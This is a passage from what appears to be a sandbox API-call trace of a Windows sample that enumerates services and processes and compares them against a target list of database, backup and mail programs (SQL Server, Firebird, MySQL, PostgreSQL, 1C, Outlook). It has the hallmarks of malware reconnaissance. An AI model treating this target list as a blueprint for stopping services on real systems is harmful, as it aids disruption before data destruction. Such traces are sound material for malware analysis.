lpString2="Schedule") returned 1 [0058.020] lstrlenW (lpString="SENS") returned 4 [0058.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0058.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0058.020] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0058.020] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0058.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0058.020] lstrlenW (lpString="ShellHWDetection") returned 16 [0058.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0058.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0058.020] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0058.020] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0058.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0058.020] lstrlenW (lpString="Spooler") returned 7 [0058.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0058.021] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0058.021] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0058.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0058.021] lstrlenW (lpString="swprv") returned 5 [0058.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0058.021] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0058.021] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0058.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0058.021] lstrlenW (lpString="SysMain") returned 7 [0058.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0058.021] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0058.021] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0058.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0058.021] lstrlenW (lpString="Themes") returned 6 [0058.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0058.021] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0058.021] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0058.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0058.021] lstrlenW (lpString="TrkWks") returned 6 [0058.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0058.021] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0058.021] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0058.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0058.021] lstrlenW (lpString="UxSms") returned 5 [0058.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0058.021] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0058.021] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0058.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0058.021] lstrlenW (lpString="VSS") returned 3 [0058.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0058.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0058.022] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0058.022] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0058.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0058.022] lstrlenW (lpString="WdiServiceHost") returned 14 [0058.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0058.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0058.022] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0058.022] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0058.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0058.022] lstrlenW (lpString="WdiSystemHost") returned 13 [0058.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0058.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0058.022] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0058.022] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0058.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0058.022] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0058.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0058.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0058.022] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0058.022] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0058.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0058.022] lstrlenW (lpString="Winmgmt") returned 7 [0058.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0058.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0058.022] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0058.022] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0058.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0058.022] lstrlenW (lpString="WPDBusEnum") returned 10 [0058.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0058.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0058.022] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0058.022] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0058.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0058.022] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e39b0 | out: hHeap=0x5f0000) returned 1 [0058.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15c [0058.025] Process32FirstW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.025] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0058.026] lstrlenW (lpString="System") returned 6 [0058.026] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0058.026] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0058.026] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0058.026] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0058.026] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0058.026] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0058.026] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0058.026] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0058.027] lstrlenW (lpString="smss.exe") returned 8 [0058.027] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0058.027] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0058.027] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0058.027] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0058.027] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0058.027] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0058.027] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0058.027] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.028] lstrlenW (lpString="csrss.exe") returned 9 [0058.028] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0058.028] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0058.028] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0058.028] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0058.028] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0058.028] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0058.028] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0058.028] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0058.029] lstrlenW (lpString="wininit.exe") returned 11 [0058.029] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0058.029] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0058.029] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0058.029] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.029] lstrlenW (lpString="csrss.exe") returned 9 [0058.029] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0058.030] lstrlenW (lpString="winlogon.exe") returned 12 [0058.030] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0058.031] lstrlenW (lpString="services.exe") returned 12 [0058.031] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0058.032] lstrlenW (lpString="lsass.exe") returned 9 [0058.032] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0058.033] lstrlenW (lpString="lsm.exe") returned 7 [0058.033] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.033] lstrlenW (lpString="svchost.exe") returned 11 [0058.033] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.034] lstrlenW (lpString="svchost.exe") returned 11 [0058.034] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.035] lstrlenW (lpString="svchost.exe") returned 11 [0058.035] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.035] lstrlenW (lpString="svchost.exe") returned 11 [0058.035] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.036] lstrlenW (lpString="svchost.exe") returned 11 [0058.036] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0058.037] lstrlenW (lpString="audiodg.exe") returned 11 [0058.037] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.037] lstrlenW (lpString="svchost.exe") returned 11 [0058.037] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.038] lstrlenW (lpString="svchost.exe") returned 11 [0058.038] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0058.039] lstrlenW (lpString="dwm.exe") returned 7 [0058.039] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0058.040] lstrlenW (lpString="explorer.exe") returned 12 [0058.040] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0058.040] lstrlenW (lpString="spoolsv.exe") returned 11 [0058.040] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0058.041] lstrlenW (lpString="taskhost.exe") returned 12 [0058.041] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.042] lstrlenW (lpString="svchost.exe") returned 11 [0058.042] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0058.042] lstrlenW (lpString="taskeng.exe") returned 11 [0058.042] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0058.043] lstrlenW (lpString="taskhost.exe") returned 12 [0058.043] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0058.044] lstrlenW (lpString="entrepreneur.exe") returned 16 [0058.044] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0058.044] lstrlenW (lpString="andrew kinds.exe") returned 16 [0058.044] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0058.045] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0058.045] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0058.046] lstrlenW (lpString="educated.exe") returned 12 [0058.046] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0058.073] lstrlenW (lpString="servers.exe") returned 11 [0058.073] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0058.074] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0058.074] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0058.074] lstrlenW (lpString="gbp_chair.exe") returned 13 [0058.074] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0058.075] lstrlenW (lpString="attention infected.exe") returned 22 [0058.075] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0058.076] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0058.076] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0058.076] lstrlenW (lpString="pattern amateur.exe") returned 19 [0058.076] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0058.077] lstrlenW (lpString="referral.exe") returned 12 [0058.077] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0058.078] lstrlenW (lpString="copyingseems.exe") returned 16 [0058.078] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0058.079] lstrlenW (lpString="spin generally.exe") returned 18 [0058.079] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0058.079] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0058.079] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0058.080] lstrlenW (lpString="transmit.exe") returned 12 [0058.080] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0058.081] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0058.081] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0058.081] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0058.081] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0058.082] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0058.082] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0058.083] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0058.083] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0058.083] lstrlenW (lpString="delight.exe") returned 11 [0058.083] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0058.084] lstrlenW (lpString="within enquiry.exe") returned 18 [0058.084] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0058.085] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0058.085] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, 